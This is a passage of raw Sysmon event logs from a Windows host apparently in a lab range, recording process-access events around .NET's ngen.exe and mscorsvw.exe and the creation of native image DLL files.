13:48:00.686{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C202-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:00.623{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\d58-0\System.Web.DataVisualization.Design.dll2021-01-18 13:48:00.623 10341000x80000000000000006999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.405{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.389{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.389{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C102-00000000A301}3416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.342{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C002-00000000A301}1580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.327{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C002-00000000A301}1580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.327{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C002-00000000A301}1580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:00.186{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1148-0\System.Web.DataVisualization.dll2021-01-18 13:48:00.186 11241100x80000000000000007011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:02.936{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11b0-0\System.Web.DynamicData.dll2021-01-18 13:48:02.936 10341000x80000000000000007010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.373{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.358{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:02.358{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9192-6005-C402-00000000A301}4528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:02.217{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\120c-0\System.Web.Extensions.dll2021-01-18 13:48:02.217 10341000x80000000000000007031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.826{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.811{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.811{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-CA02-00000000A301}4768C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.623{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C902-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.608{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C902-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.608{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C902-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:03.545{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1220-0\System.Web.Entity.dll2021-01-18 13:48:03.545 10341000x80000000000000007024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.280{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.264{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.264{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C802-00000000A301}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.217{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C702-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.201{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9193-6005-C702-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.201{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9193-6005-C702-00000000A301}4576C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:03.155{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12e0-0\System.Web.DynamicData.Design.dll2021-01-18 13:48:03.155 10341000x80000000000000007017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:03.076{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9193-6005-C602-00000000A301}4832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 